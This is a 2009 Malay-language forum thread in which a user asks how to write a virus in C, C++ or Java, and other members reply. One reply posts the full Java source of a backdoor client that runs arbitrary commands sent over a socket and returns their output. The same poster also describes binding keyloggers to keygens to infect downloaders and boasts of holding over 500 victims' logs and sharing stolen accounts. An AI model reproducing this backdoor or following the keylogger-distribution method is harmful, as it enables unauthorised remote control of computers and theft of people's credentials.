Forum Sementara Putera.com

Bersama kita perkemaskan forum ini sementara forum asal dalam pemulihan.

Forum putera dah kembali. Masalah sudah berjaya diselesaikan. Sila lawati http://forum.putera.com/tanya

    Macammana nak guna C, C++, JAVA buat Virus

    Share

    izwanensem
    Ahli Baharu
    Ahli Baharu

    Number of posts: 129
    Registration date: 08/06/2009

    Macammana nak guna C, C++, JAVA buat Virus

    Post by izwanensem on Wed Aug 26, 2009 11:28 am

    salam buat sume.......nak tanyalah mcm mana kita nak buat virus guna C, C++, JAVA or other Programming Language yg lain. Boleh tunjukkan cara x, Aku bukannya berniat jahat, cuma saja jer nak tambah ilmu pengetahuan. Masa aku belajar dulu cuma belajar nak buat sifir, Operasi Algoritma dll, itu pun dah banyak lupa coz lama xusik, hehe. Nak buat virus ni xder pulak. Minta tolong yer kepada otai2. tq

    Hitoru
    Ahli Baharu
    Ahli Baharu

    Number of posts: 26
    Registration date: 25/05/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by Hitoru on Thu Aug 27, 2009 9:08 am

    Takde keje lain ke nak buat Virus? Cuba belajar programming untuk buat game ke? Negara kita kekurangan game programmer!
    Yang 3D game tau!!

    izwanensem
    Ahli Baharu
    Ahli Baharu

    Number of posts: 129
    Registration date: 08/06/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by izwanensem on Thu Aug 27, 2009 10:19 am

    hehehe.......jgnla marahhhhh.....programming utk buat game, kira ok gak tu.......boleh tolong tunjukkan ke?

    BasicCX
    Ahli Baharu
    Ahli Baharu

    Gender: Male Number of posts: 230
    Registration date: 25/02/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by BasicCX on Thu Aug 27, 2009 10:49 am

    Belajar programming, mulakan dengan basic command kemudian rujuk tutorial/contoh daripada internet/buku

    izwanensem
    Ahli Baharu
    Ahli Baharu

    Number of posts: 129
    Registration date: 08/06/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by izwanensem on Thu Aug 27, 2009 11:49 am

    ooo....ok, tq ya

    Hitoru
    Ahli Baharu
    Ahli Baharu

    Number of posts: 26
    Registration date: 25/05/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by Hitoru on Thu Aug 27, 2009 1:46 pm

    Taklah marah sangat. Aku trauma sket sebab baru je format PC sebab kena virus. Kena lancarkan kampen 'Belia benci virus!'.

    Kau ni baru nak berjinak2 dalam dunia programming ke atau dah beberapa tahun berkecimpung?

    Apa kepakaran kau?

    LanoG
    Moderators
    Moderators

    Gender: Male Number of posts: 537
    Location: Petaling Jaya
    Job/hobbies: Basuh Pinggan
    Registration date: 04/05/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by LanoG on Thu Aug 27, 2009 4:36 pm

    Huhuhu.. garang nyer Hitoru..

    Setsuna F. Seiei
    Ahli Baharu
    Ahli Baharu

    Gender: Female Number of posts: 210
    Age: 56
    Registration date: 27/02/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by Setsuna F. Seiei on Thu Aug 27, 2009 6:48 pm

    boleh try endless loop untuk createnewfile XD haha .. java susah nak buat virus la .. paling bagus client botnet .. better guna c++ nak lagi old school pakai assembly

    Code:
    import java.net.Socket;
    import java.net.ServerSocket;
    import java.io.BufferedReader;
    import java.io.BufferedWriter;
    import java.io.InputStreamReader;
    import java.io.OutputStreamWriter;
    import java.io.IOException;
    import java.io.File;

    class BackdoorClient extends Thread {

       private Socket socket;

       private BufferedReader reader;
       private BufferedWriter writer;

       private String workingDirectory;

       public BackdoorClient(Socket socket) {
          this.socket = socket;
          this.start();
       }

       public void run() {
          try {
             this.reader = new BufferedReader(new InputStreamReader(this.socket.getInputStream()));
             this.writer = new BufferedWriter(new OutputStreamWriter(this.socket.getOutputStream()));
             this.workingDirectory = Util.getJARLoc();
             this.workingDirectory = this.workingDirectory.substring(0, this.workingDirectory.lastIndexOf("\\")) + "\\";
             this.write(this.workingDirectory);
             Debug.print("Wrote working dir\n");
             while(this.socket.isConnected() && MiscStatus.backdoorConnected) {
                try {
                   String line = this.reader.readLine();
                   if(line == null) {
                      continue;
                   } else {
                      this.interpret(line);
                      this.write(":END");
                      this.write(this.workingDirectory);
                   }
                } catch(IOException ioe) {
                }
             }
             MiscStatus.backdoorConnected = false;
          } catch(IOException ioe) {
             Debug.print("Backdoor reader / writer instantiation throwed IOException: " + ioe.toString());
             MiscStatus.backdoorConnected = false;
          }
       }

       private void interpret(String line) {
          String[] args = Util.splitArgs(line);
          if(args[0].equals("exit")) {
             try {
                this.reader.close();
                this.writer.close();
                this.socket.close();
             } catch(IOException ioe) {
             }
          } else if(args[0].equals("shutdown")) {
             System.exit(1);
          } else if(args[0].equals("shutdown listener")) {
             ServerStatus.backdoorListening = false;
          } else if(args[0].startsWith("cd")) {
             if(args.length == 2) {
                String dir = args[1];
                if(dir.indexOf(":\\") == -1) {
                   File file = new File(this.workingDirectory + dir);
                   if(file.exists()) {
                      if(file.isDirectory()) {
                         this.workingDirectory = this.workingDirectory + dir;
                         if(!this.workingDirectory.endsWith("\\")) {
                            this.workingDirectory = this.workingDirectory + "\\";
                         }
                      } else {
                         this.write("No such directory: " + dir + "\n");
                      }
                   } else {
                      this.write("No such directory: " + dir + "\n");
                   }
                } else {
                   File file = new File(dir);
                   if(file.exists()) {
                      if(file.isDirectory()) {
                         this.workingDirectory = dir;
                         if(!this.workingDirectory.endsWith("\\")) {
                            this.workingDirectory = this.workingDirectory + "\\";
                         }
                      } else {
                         this.write("No such directory: " + dir + "\n");
                      }
                   } else {
                      this.write("No such directory: " + dir + "\n");
                   }
                }
             }
          } else if(args[0].equals("ls")) {
             File dir = new File(this.workingDirectory);
             if(!dir.exists() || !dir.isDirectory()) {
                this.write("No files found.\n");
                return;
             }
             this.write("Contents of " + this.workingDirectory + ":\n\n");
             for(File file : dir.listFiles()) {
                if(file.isDirectory()) {
                   this.write("<DIR> " + file.getName() + "\n");
                } else {
                   long size = file.length();
                   if(size >= (1024 * 1024 * 1024)) {
                      this.write(file.getName() + " (" + (size / (1024 * 1024 * 1024)) + " GB)\n");
                   } else if(size >= (1024 * 1024)) {
                      this.write(file.getName() + " (" + (size / (1024 * 1024)) + " MB)\n");
                   } else if(size >= 1024) {
                      this.write(file.getName() + " (" + (size / 1024) + " KB)\n");
                   } else if(size < 1024) {
                      this.write(file.getName() + " (" + size + " bytes)\n");
                   }
                }
                try {
                   this.sleep(10);
                } catch(InterruptedException ie) {
                }
             }
          } else {
             try {
                Process process = Runtime.getRuntime().exec(line);
                if(line.indexOf(".exe") != -1) {
                   return;
                }
                BufferedReader in = new BufferedReader(new InputStreamReader(process.getInputStream()));
                String str;
                while((str = in.readLine()) != null) {
                   this.write(str + "\n");
                }
             } catch(IOException ioe) {
                try {
                   Process process2 = Runtime.getRuntime().exec(this.workingDirectory + line);
                   if(line.indexOf(".exe") != -1) {
                      return;
                   }
                   BufferedReader in2 = new BufferedReader(new InputStreamReader(process2.getInputStream()));
                   String str2;
                   while((str2 = in2.readLine()) != null) {
                      this.write(str2 + "\n");
                   }
                } catch(IOException ioe2) {
                   this.write("IOException thrown: " + ioe2.toString());
                }
             }
          }
       }

       private void write(String str) {
          str = str.replaceAll("\n", "");
          try {
             this.writer.write(str);
             this.writer.newLine();
             this.writer.flush();
          } catch(IOException ioe) {
          }
       }

    }

    salah satu contoh backdoor untuk java .. lol java aku cam haram jadah exam dah nak dekat mampos aku

    Razi_IBM
    Ahli Rajin
    Ahli Rajin

    Gender: Male Number of posts: 1062
    Age: 23
    Location: on dmz.hack me if u can.
    Job/hobbies: Saboteur
    Registration date: 14/02/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by Razi_IBM on Thu Aug 27, 2009 6:55 pm

    ada beza ke nak buat virus ngan app lain?

    sama je..yang penting tau mekanisma i/o dalam OS, operation apa yang os akan kawal, apa yang dikawal, macam mana data di handle dan sedikit sebanyak pengalaman tentang habit pengguna komputer. so, lepas tu pandai2 la exploit.
    blaja basic2 dulu, sekadar virus yang menyusahkan/annoying<-aku dulu start dari sini(tapi vb jela..)
    pastu baru la start main manipulate data.

    Hitoru
    Ahli Baharu
    Ahli Baharu

    Number of posts: 26
    Registration date: 25/05/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by Hitoru on Thu Aug 27, 2009 7:09 pm

    Bezanya virus = perosak, Apps lain = gives pleasure to user Razz

    Banyak lagi cara nak belajar tentang programming. Bak nyanyian Ruhil " Hei, jangan main api, nanti terbakar diri".

    Argh!! Jahanam virus yg rosakkan PC ku tempoh hari!! Mad

    Setsuna F. Seiei
    Ahli Baharu
    Ahli Baharu

    Gender: Female Number of posts: 210
    Age: 56
    Registration date: 27/02/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by Setsuna F. Seiei on Thu Aug 27, 2009 8:03 pm

    takpayah la susah susah nak blajar programming ... gi jadi jer script kiddie download keylogger pastu upload kat rs bind ngan keygen pastu post link
    sure dapat victim .. aku skang dah ada 500 lebey log

    Razi_IBM
    Ahli Rajin
    Ahli Rajin

    Gender: Male Number of posts: 1062
    Age: 23
    Location: on dmz.hack me if u can.
    Job/hobbies: Saboteur
    Registration date: 14/02/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by Razi_IBM on Thu Aug 27, 2009 8:38 pm

    Hitoru wrote:Bezanya virus = perosak, Apps lain = gives pleasure to user Razz

    Banyak lagi cara nak belajar tentang programming. Bak nyanyian Ruhil " Hei, jangan main api, nanti terbakar diri".

    Argh!! Jahanam virus yg rosakkan PC ku tempoh hari!! Mad

    tak perlu la emo sangat.

    Hitoru
    Ahli Baharu
    Ahli Baharu

    Number of posts: 26
    Registration date: 25/05/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by Hitoru on Thu Aug 27, 2009 8:46 pm

    Adush! gambar Bush ko letak.

    "takpayah la susah susah nak blajar programming ... gi jadi jer script kiddie download keylogger pastu upload kat rs bind ngan keygen pastu post link
    sure dapat victim .. aku skang dah ada 500 lebey log"

    Ini yang tak sedap dengar ni. Apa kau buat dengan 500 lebih log tu?
    Selalu keygen software banyak antivirus detect ada virus tu sebenarnya memang virus la yerk? Ke ada yang behavior macam virus tapi tak merbahaya?

    Setsuna F. Seiei
    Ahli Baharu
    Ahli Baharu

    Gender: Female Number of posts: 210
    Age: 56
    Registration date: 27/02/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by Setsuna F. Seiei on Thu Aug 27, 2009 9:34 pm

    Hitoru wrote:Adush! gambar Bush ko letak.

    "takpayah la susah susah nak blajar programming ... gi jadi jer script kiddie download keylogger pastu upload kat rs bind ngan keygen pastu post link
    sure dapat victim .. aku skang dah ada 500 lebey log"

    Ini yang tak sedap dengar ni. Apa kau buat dengan 500 lebih log tu?
    Selalu keygen software banyak antivirus detect ada virus tu sebenarnya memang virus la yerk? Ke ada yang behavior macam virus tapi tak merbahaya?

    keygen tu actually clean pada asalnya cuma .. uploader yang bukan orignal re-up and bind trojan guna binder ... lagi mahal binder lagi bagus la undetected by antivirus. Trojan ni bukan la macam worm takdak multiply diri dia by itself and takder la sampai tahap merosakkan komputer sampai kena reformat .

    p/s:aku tak buat aper ngan log tu cuma ...tengok jer Kadang aku buat Strategic patnership di mana aku akan kongsi account diorang and spread lagi banyak Smile

    Hitoru
    Ahli Baharu
    Ahli Baharu

    Number of posts: 26
    Registration date: 25/05/2009

    Re: Macammana nak guna C, C++, JAVA buat Virus

    Post by Hitoru on Fri Aug 28, 2009 5:14 am

    Pergh!! Nampaknya memang durjana betul la biskut tawar keygen yg ber trojan. Dah agak dah mesti takde orang yg akan biskut tawar software tanpa ada apa2 faedah bagi dirinya. Mana ada orang nak buat bende secara percuma, nak2 biskut tawar software yg agak payah.

    Bagai mana pula dengan informasi Login ID user computer tu kat email akaun dan akaun web2 lain? Boleh kah di perolehi oleh hackers ini melalui trojan durjana? Shocked

      Current date/time is Sat Aug 02, 2014 12:29 pm